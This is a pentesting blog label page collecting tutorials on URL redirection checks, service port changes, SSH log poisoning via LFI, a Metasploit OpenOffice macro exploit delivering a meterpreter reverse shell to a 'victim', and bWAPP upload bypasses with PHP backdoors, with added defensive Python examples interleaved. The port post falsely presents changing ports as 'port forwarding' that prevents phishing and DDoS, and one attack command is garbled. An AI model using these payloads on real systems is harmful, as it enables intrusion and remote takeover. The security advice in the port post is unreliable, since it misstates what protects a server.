Showing posts with label Kali Linux. Show all posts

Understanding Redirection with Hashing and Crypto Salt (Part 2)

In the previous article we explained the concept of redirection, covering basic and encoded redirections; in this article we cover more secure redirection using hashing and salting techniques.

This article also uses the same PHP scripts, with small modifications to the code.
Redirection using Hash Values
In the browser, open http://localhost/hashing/home.php

Hover over Redirect Link, which points to the redirection page (re.php). The redirection link contains not only the URL as a parameter but also its hash: we pass the URL together with a hash value generated with MD5, SHA1, SHA512 or any other hashing algorithm, and the redirection only works if the combination of URL and hash is correct.

(As shown in the figure below.) This is a more secure way of redirection.


For the sake of understanding, our redirection link shows the parameters (URL and hash), but in real development we can hide them so that an attacker cannot tell where the page is being redirected.

When we click Redirect Link, the redirection script in re.php reads the passed URL, generates its hash value (we are using the MD5 algorithm) and compares it with the hash value sent in the request; if the two hash values match the redirection works, otherwise it fails.

We are using a hash calculator to generate the MD5 value of "http://www.hackingarticles.in".


The MD5 hash value of "http://www.hackingarticles.in" is 8258c1efb05943d059476150cb22df1d.
In the image below we replace this original hash value with a different value, for example "9258c1efb05943d059476150cb22df1d" (only the first digit has been changed from 8 to 9).


The redirection fails and the script returns an error message. Finally, we send the URL along with the correctly generated hash value as parameters; the result is shown below.


Redirection using Hash Values with salting

In the browser, open http://localhost/hashing/home.php (the page where our scripts are).

Hover over Redirect Link, which points to the redirection page (re.php). Here we can see one more parameter, salt. In the previous method we worked with hash values alone; with salting we introduce one more parameter, the salt, and generate the hash of the URL with the salt value prepended to the front of the URL or appended to its end. The salt value could be anything: a combination of characters, digits, alphanumerics, special characters or whatever we want (in this example we are using the salt value "ignite"). By using salts we further increase the security of the URL redirection.



For the sake of understanding, our redirection link shows the parameters (URL, hash and salt), but in real development we can hide them so that an attacker cannot tell where the page is being redirected.
When we click Redirect Link, the redirection script in re.php reads the passed URL, generates its hash value (we are using the SHA1 algorithm) with the salt value (ignite) prepended to the URL, and compares it with the hash value sent in the request; if the two hash values match the redirection works, otherwise it fails.


In the image above we generate the SHA1 hash value with the salt "ignite" prepended to the URL "http://www.hackingarticles.in". Any online/offline converter can be used; in this example we generate the SHA1 hash through http://online-code-generator.com/sha1-hash-with-optional-salt.php


The sha1 hash value of the URL with salt is: 5955e7e3533a0afac6ddfee60a32e2a6731cf626


If the hash value sent differs from the original value, our script returns an error. In the image below we change the SHA1 hash value from 5955e7e3533a0afac6ddfee60a32e2a6731cf626 to 8955e7e3533a0afac6ddfee60a32e2a6731cf626 (only the first digit is changed from 5 to 8) and get the following result.

Finally, we send the URL along with the correctly generated hash value as parameters; the result is shown below.
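Both checks described above, written here as an added Python example rather than the post's PHP: build_link produces the query string home.php puts in Redirect Link, and verify_redirect is the re.php side of the check. Because the post's links carry the URL, the hash and even the salt, those two tokens only catch accidental corruption of the link; hmac_token is an addition here (SERVER_KEY is an assumed value) that keys the token with a secret kept on the server, so nothing in the link alone is enough to produce a valid URL/hash pair.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlencode

SALT = "ignite"                     # salt used in the post; the link carries it as a parameter
SERVER_KEY = "server-side-secret"   # assumption: secret for the HMAC variant, never put in a link


def md5_token(url):
    """First scheme in the post: plain MD5 of the URL."""
    return hashlib.md5(url.encode()).hexdigest()


def salted_sha1_token(url, salt=SALT):
    """Second scheme in the post: SHA1 over the salt prepended to the URL."""
    return hashlib.sha1((salt + url).encode()).hexdigest()


def hmac_token(url, key=SERVER_KEY):
    """Hardened variant (added here): HMAC-SHA256 keyed with a server-side secret."""
    return hmac.new(key.encode(), url.encode(), hashlib.sha256).hexdigest()


def build_link(url, scheme):
    """Query string home.php would put in Redirect Link for the chosen scheme."""
    if scheme == "md5":
        return urlencode({"url": url, "hash": md5_token(url)})
    if scheme == "sha1salt":
        return urlencode({"url": url, "hash": salted_sha1_token(url), "salt": SALT})
    if scheme == "hmac":
        return urlencode({"url": url, "hash": hmac_token(url)})
    raise ValueError(scheme)


def verify_redirect(query, scheme):
    """Check re.php performs: recompute the token for the url parameter and compare it
    with the hash parameter. Returns the URL to redirect to, or None on mismatch."""
    params = parse_qs(query)
    url = params.get("url", [""])[0]
    sent = params.get("hash", [""])[0]
    if scheme == "md5":
        expected = md5_token(url)
    elif scheme == "sha1salt":
        expected = salted_sha1_token(url, params.get("salt", [""])[0])
    elif scheme == "hmac":
        expected = hmac_token(url)
    else:
        return None
    # constant-time comparison, so the check does not leak how many bytes matched
    return url if hmac.compare_digest(expected, sent) else None


if __name__ == "__main__":
    target = "http://www.hackingarticles.in"
    for name in ("md5", "sha1salt", "hmac"):
        link = build_link(target, name)
        print(name, link, "->", verify_redirect(link, name))
```

Running it prints the MD5 and salted SHA1 tokens for the post's URL, which can be compared with the values the post reports from its online calculators.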


Understanding Redirection with Encoding Techniques (Part 1)

A redirect automatically sends a website's visitors to a different location or URL; the redirection could be to a different location within the same site or to a new site or webpage.

Insecure redirection and forwarding result when a web application accepts untrusted input that can cause it to redirect the request to a URL contained within that untrusted, unvalidated input; we can also call this type of redirection Unvalidated Redirection.

We demonstrate the concept and types of redirection through PHP code running under an Apache server on a local machine running Kali Linux. A WAMP or XAMPP server can also be used on a Windows machine to run these scripts. To execute the redirection scripts, put the code in the /var/www/html directory, which is the directory localhost points to (in our case).
References
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
Basic Redirection
In the browser, open localhost/redirect/home.php

Hover over Redirect Link, which points to the redirection page (re.php). We can see the redirection target in clear text (as shown in the figure below).


When we click this link we are redirected to http://www.hackingarticles.in, as coded in our redirection script (re.php).


This is basic redirection, where we simply redirect users from one page to another through PHP scripts without taking any security measures into account. The encoded variants of redirection are explained below.

URL Encoding
In the browser, open localhost/hex/home.php (the page where our scripts are)
Hover over Redirect Link, which points to the redirection page (re.php). We can see the redirection target in clear text (as shown in the figure below).



Here we use the same script for the home page, but in this redirection we use simple URL encoding: we send our URL in URL-encoded format, and the encoded URL is decoded by the script running on the redirection page (re.php in this case).
Any online/offline converter can be used to calculate the URL-encoded value (in this example we are using http://www.meyerweb.com/).
Refer to the screenshot below for the URL encoding.




Right-click Redirect Link on home.php, copy the link location and paste the URL in a new tab. If we replace the redirect URL with its URL-encoded value we land on the same page.


The following is the result


HEX Encoding
Here we convert the URL to its hexadecimal (percent-encoded) value using Burp Suite (any online/offline tool can be used).


The single hex-encoded value of http://www.hackingarticles.in is
%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%69%6e%67%61%72%74%69%63%6c%65%73%2e%69%6e
Right-click Redirect Link on home.php, copy the link location and paste the URL in a new tab. If we replace the redirect URL with the single hex-encoded value we land on the same page.


The following is the result


Multilevel Encoding
Here we demonstrate multilevel encoding, where we re-encode the already encoded values.


The double hex-encoded value of http://www.hackingarticles.in is
%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%37%37%25%37%37%25%37%37%25%32%65%25%36%38%25%36%31%25%36%33%25%36%62%25%36%39%25%36%65%25%36%37%25%36%31%25%37%32%25%37%34%25%36%39%25%36%33%25%36%63%25%36%35%25%37%33%25%32%65%25%36%39%25%36%65

Right-click Redirect Link on home.php, copy the link location and paste the URL in a new tab. If we replace the redirect URL with the double hex-encoded value we land on the same page.



The following is the result



Base 64 Encoded Redirection

In the browser, open http://localhost/base64/home.php
Hover over Redirect Link, which points to the redirection page (re.php). Here we pre-encode our URL to its Base64 value, so the URL is no longer readable to the naked eye (as shown in the figure below).



The image below shows the Base64 encoding of our URL http://www.hackingarticles.in



The Base64-encoded value of http://www.hackingarticles.in is
"aHR0cDovL3d3dy5oYWNraW5nYXJ0aWNsZXMuaW4="

The following is the output
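Every encoding in this article is undone by re.php before the redirect, so whatever check the script makes has to run on the fully decoded value, not on the parameter as received. As an added example (not the post's PHP), a Python decoder that peels the single, double and Base64 forms shown above and then accepts only targets on an allowlist; ALLOWED_HOSTS and the layer bound are assumptions, the encoded samples are the post's own.

```python
import base64
import binascii
from typing import Optional
from urllib.parse import unquote, urlparse

# Allowlist of hosts re.php may send users to (assumption: the post does not define one).
ALLOWED_HOSTS = {"www.hackingarticles.in"}
MAX_PERCENT_LAYERS = 3   # bound on peeling, so a long chain of %25 cannot keep the loop busy

# The post's encoded forms of http://www.hackingarticles.in, copied here as test inputs.
SINGLE_HEX = "%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%69%6e%67%61%72%74%69%63%6c%65%73%2e%69%6e"
DOUBLE_HEX = ("%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%37%37%25%37%37"
              "%25%37%37%25%32%65%25%36%38%25%36%31%25%36%33%25%36%62%25%36%39%25%36%65%25%36%37"
              "%25%36%31%25%37%32%25%37%34%25%36%39%25%36%33%25%36%63%25%36%35%25%37%33%25%32%65"
              "%25%36%39%25%36%65")
BASE64_URL = "aHR0cDovL3d3dy5oYWNraW5nYXJ0aWNsZXMuaW4="


def decode_layers(value: str) -> str:
    """Undo percent-encoding until the text stops changing (bounded), then try Base64.
    This is the decoding re.php must finish before it looks at the URL at all."""
    current = value
    for _ in range(MAX_PERCENT_LAYERS):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    if not current.lower().startswith(("http://", "https://")):
        try:
            plain = base64.b64decode(current, validate=True).decode("utf-8")
            if plain.lower().startswith(("http://", "https://")):
                current = plain
        except (binascii.Error, UnicodeDecodeError):
            pass
    return current


def safe_redirect_target(value: str) -> Optional[str]:
    """Validate only after every layer is removed: scheme must be http(s) and the host
    must be on the allowlist. Anything else gets no redirect at all."""
    url = decode_layers(value)
    parsed = urlparse(url)
    if parsed.scheme in ("http", "https") and parsed.hostname in ALLOWED_HOSTS:
        return url
    return None


if __name__ == "__main__":
    for sample in (SINGLE_HEX, DOUBLE_HEX, BASE64_URL, "http%3A%2F%2Fevil.example%2F"):
        print(repr(sample[:24]), "->", safe_redirect_target(sample))
```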

How to Secure Your Port using Port Forwarding

In this article I am going to show how to use port forwarding on a system, which is a process that redirects a communication request from one port to another port or host. It basically allows an outside computer to connect to a computer in a private local area network. Commonly used port forwarding includes forwarding port 22 for SSH access, port 80 for web servers and port 21 for FTP. The major advantage is that it provides security to your private network and secure communication.
Let's start!

HTTP and HTTPS forwarding
Open the ports.conf file in /etc/apache2 and type the following command to read the configuration.
cat ports.conf


From the screenshot you can see the present listening ports, 80 and 443, for the web server.


If an attacker wants to send a malicious file through the web server, he will try to connect to the target on port 80 and send the phishing page to the target.

To protect yourself from being targeted through a phishing page, change the port numbers from 80 and 443 to other numbers.

In the following screenshot you will see that I have modified port 80 to 8088 and port 443 to 44343.


FTP port forwarding
Now open the vsftpd.conf file in /etc.
From the screenshot you can see that the listen port is 21 by default; to protect yourself from FTP attacks, move the FTP service to another port.


In the screenshot below you will find that I have changed port 21 to 2121.


SSH port forwarding

Open the file /etc/ssh/sshd_config
From the screenshot you will find that by default port 22 is used as the listen port, which is badly affected by DDoS attacks. To protect yourself, apply the port forwarding technique to port 22.


In the image below, again you will notice that I have changed port 22 to port 2222.


Now if you scan your network with Nmap you will find that the FTP, HTTP and SSH services are running on the modified ports.
nmap -p- -sV 192.168.1.24

Web Server Exploitation with SSH Log Poisoning through LFI

In this article you will learn how to gain unauthorized access to a web server that suffers from a local file inclusion vulnerability with the help of the auth log file. To perform this attack you first need to read my previous article, which will help you create a local file inclusion vulnerability manually.

Attacker: Kali Linux
Target: Metasploitable 2

Open a terminal in your Kali Linux and connect to the target using the SSH service.

From the screenshot you can see I am connected to the target PC; now type the following command to check the permissions of the auth.log file
ls -l /var/log/auth.log


Now if you look at the screenshot again you will find that the highlighted text shows that read/write permission has been given to the auth.log file.


Since we know that the auth.log file has read permission, type the following command to view its logs.
tail -f /var/log/auth.log

The highlighted text shows the log entry for the valid user msfadmin.


Now open another terminal in Kali, where I will try to connect to the web server using a fake user name and then confirm whether a log entry is generated inside auth.log for the invalid user.

ssh hacker@192.168.1.105


When you move back to the previous terminal you will find it has created a log entry for the invalid user hacker, which you can also check in the given screenshot.


Hence it is confirmed that the auth.log file generates an entry for every failed and successful login when we connect to the web server. Taking advantage of this behaviour, I will now send PHP code as the fake user name, and it will automatically be added to auth.log as a new log entry.

Ssh ’@192.168.1.105


When you check the log again, you will find the PHP code has been added as a new log entry.


I have already created the LFI vulnerability manually inside the web server; if you want to create the LFI vulnerability yourself, see the link to the previous article above.
In the given screenshot you can see that when I browse the lfi.php file it shows an error that looks like a local file inclusion vulnerability.

Now include the auth.log file as the file parameter by entering the following URL in the browser.
192.168.1.105/lfi/lfi.php?file=/var/log/auth.log

From the screenshot you can read the warning that it cannot execute a blank command; this means our PHP code, which contains the command parameter, was successfully injected, and now we only need to send a command as that parameter.



192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps

Here it dumps the auth.log data as well as executing the command given through the cmd parameter. From the screenshot you can see both the log and the process state.


In the same way, execute pwd through the cmd parameter and view the result in the given screenshot.
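The technique works because sshd writes the supplied user name into auth.log unchanged and the file is readable by the account the web server runs as. As an added detection example (not from the post), a Python check over constructed auth.log lines that flags invalid-user entries carrying PHP tags or characters no account name contains, plus a mode-bit check for the readability the post relies on; the sample lines and IPs are made up.

```python
import re
import stat

# Constructed sample auth.log lines in the format Debian/Ubuntu sshd writes; IPs are made up.
SAMPLE_LOG = """\
Mar  3 10:01:12 metasploitable sshd[4512]: Accepted password for msfadmin from 192.168.1.10 port 50122 ssh2
Mar  3 10:02:40 metasploitable sshd[4530]: Invalid user hacker from 192.168.1.10
Mar  3 10:02:42 metasploitable sshd[4530]: Failed password for invalid user hacker from 192.168.1.10 port 50130 ssh2
Mar  3 10:03:05 metasploitable sshd[4551]: Invalid user <?php echo 'poisoned'; ?> from 192.168.1.10
Mar  3 10:03:07 metasploitable sshd[4551]: Failed password for invalid user <?php echo 'poisoned'; ?> from 192.168.1.10 port 50134 ssh2
"""

# sshd records the rejected name verbatim between "user" and "from <ip>".
INVALID_USER_RE = re.compile(
    r"[Ii]nvalid user (?P<user>.*?) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})")
# Anything PHP's include() would execute if the log is pulled in through an LFI.
PHP_TAG_RE = re.compile(r"<\?(?:php|=)|\?>", re.IGNORECASE)
# Shape of a legitimate Linux account name; anything else in that field is suspicious.
USERNAME_OK_RE = re.compile(r"^[a-z_][a-z0-9_.-]{0,31}\$?$")


def find_poisoned_entries(log_text):
    """Return (line_no, user, ip) for every invalid-user entry whose name looks like injected code."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = INVALID_USER_RE.search(line)
        if not m:
            continue
        user = m.group("user")
        if PHP_TAG_RE.search(user) or not USERNAME_OK_RE.match(user):
            hits.append((n, user, m.group("ip")))
    return hits


def auth_log_world_readable(mode):
    """True when the mode bits let 'other' read the file, which is what lets the
    web server's account include it; 0o640 root:adm is the usual safe setting."""
    return bool(mode & stat.S_IROTH)


if __name__ == "__main__":
    for n, user, ip in find_poisoned_entries(SAMPLE_LOG):
        print(f"line {n}: suspicious user name from {ip}: {user!r}")
    print("0o644 world-readable:", auth_log_world_readable(0o644))
```

The same regexes run unchanged over a live file (for example via tail -f piped into the script), and the mode check can be fed os.stat("/var/log/auth.log").st_mode.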

Exploiting Remote PC with Apache OpenOffice Text Document Malicious Macro Execution

This module generates an Apache OpenOffice Text Document with a malicious macro in it. To exploit successfully, the targeted user must adjust the security level in Macro Security to either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the macro. If set to Low, the macro can automatically run without any warning. The module also works against LibreOffice.

Exploit Targets
Apache OpenOffice on Windows

Requirement
Attacker: Kali Linux
Victim PC: Windows 10


Open the terminal in Kali Linux and type msfconsole to load the Metasploit framework.


Now type use exploit/multi/misc/openoffice_document_macro
msf exploit (openoffice_document_macro)>set payload windows/meterpreter/reverse_tcp
msf exploit (openoffice_document_macro)>set lhost 192.168.0.104 (IP of Local Host)
msf exploit (openoffice_document_macro)>set srvhost 192.168.01.04
msf exploit (openoffice_document_macro)>set lport 4444
msf exploit (openoffice_document_macro)>exploit
From the screenshot you can see the highlighted text showing the path of the malicious odt file.


The malicious odt file has been generated successfully and is stored on your local computer at the following path:
/root/.msf4/local/msf.odt


Now send your msf.odt file to the victim; as soon as he downloads and opens it, you will get a meterpreter shell on the victim's computer.

File Upload Exploitation in bWAPP (Bypass All Security)

In this article you will learn how to bypass all three security levels of unrestricted file upload inside bWAPP; if you want to know more about the various kinds of file upload vulnerability, read the previous article, which may help you understand this article more clearly.

LOW SECURITY

Open the target IP in the browser: 192.168.0.106/bWAPP/login.php. Enter the user name and password as bee and bug respectively.


Set the security level to low, select Unrestricted File Upload from the "Choose your bug" list box and click Hack.


Create a PHP backdoor using msfvenom and start a multi/handler in the background; in the screenshot you can see I have browsed to meter.php to upload it as an image to the web server.


When the image is successfully uploaded to the web server, it returns a link to the directory where the image is saved so you can view it. Since we haven't uploaded a real image, we will try to execute our PHP backdoor by clicking the link "here".


When the victim clicks the link "here" we get the victim's reverse connection as a meterpreter session inside the Metasploit framework.
From the screenshot you can see Metasploit session 1 is opened.


MEDIUM SECURITY

As the security level has changed, we cannot perform the same procedure as above. However, here you only need to change the extension of your PHP backdoor to bypass medium security. In the image below you will find that I have browsed to meter.php3 for uploading.

Now repeat the same steps: run the multi/handler in the background and click the given link "here" to receive the meterpreter session.


GREAT!!! From the screenshot you can see Metasploit session 2 is opened.


HIGH SECURITY
Now we enter high security, where the above two file upload attacks fail, so here again you need to make some small changes to the extension of the PHP backdoor file to upload it to the web server.
From the screenshot you can read the file name high.php.png, which I have browsed to for uploading.


Here our file is successfully uploaded; now right-click the link "here" to copy the link location, and keep the multi/handler running in the background.


To bypass the high security level of file uploading in bWAPP we need to switch the bug as well as the security level.
Set the security level to low, choose the bug Remote & Local File Inclusion and click Hack.

The requested web page, which suffers from the RFI and LFI vulnerability, opens. You will find a prompt to select a language from the given drop-down list, and when you click the Go button the selected language file is included through the URL.

I uploaded the PHP backdoor shell under high security but execute it under low security with the help of the LFI vulnerability. Now manipulate the following URL as shown in the screenshot.

http://192.168.0.106/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.0.106/bWAPP/rlfi.php?language=images/high.php.png


When the above URL is executed in the browser you get the victim's reverse connection inside Metasploit.
Congrats!!! From the screenshot you can see Metasploit session 3 is opened.
Hence we have bypassed all three security levels inside bWAPP.
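Each bypass above defeats a check that looks only at the last extension (meter.php3), only at a denylist of names, or only at the file name and never at the bytes (high.php.png). As an added example, not bWAPP's own code, a Python upload validator that inspects every dotted component of the name, checks the content against the magic number of the declared image type and stores the file under a server-chosen name; the extension sets and the constructed sample bytes are assumptions.

```python
import os
import secrets

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Extensions web servers commonly hand to the PHP interpreter; meter.php3 in the post
# got past a check that only knew ".php".
SCRIPT_EXT = {"php", "php3", "php4", "php5", "phtml", "phar"}


def check_upload(filename, data):
    """Return (accepted, reason). Every dotted component is inspected, not just the last one,
    and the bytes are checked against the magic number for the claimed type."""
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no usable extension"
    ext = parts[-1]
    if ext not in ALLOWED_EXT:
        return False, f"extension .{ext} not allowed"
    if set(parts[1:-1]) & SCRIPT_EXT:
        return False, "script extension inside file name"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared image type"
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP open tag"
    return True, "ok"


def stored_name(ext):
    """Random server-chosen name, so the stored path cannot be derived from the upload name."""
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16          # constructed minimal PNG header
    php = b"<?php echo 'test'; ?>"                      # constructed, inert PHP text
    for name, data in (("meter.php", php), ("meter.php3", php),
                       ("high.php.png", php), ("photo.png", png)):
        print(name, "->", check_upload(name, data))
```

Validation alone would not have stopped the third bypass, which ran the file through rlfi.php: the upload directory must not be reachable by a user-controlled include path, and the LFI itself needs fixing.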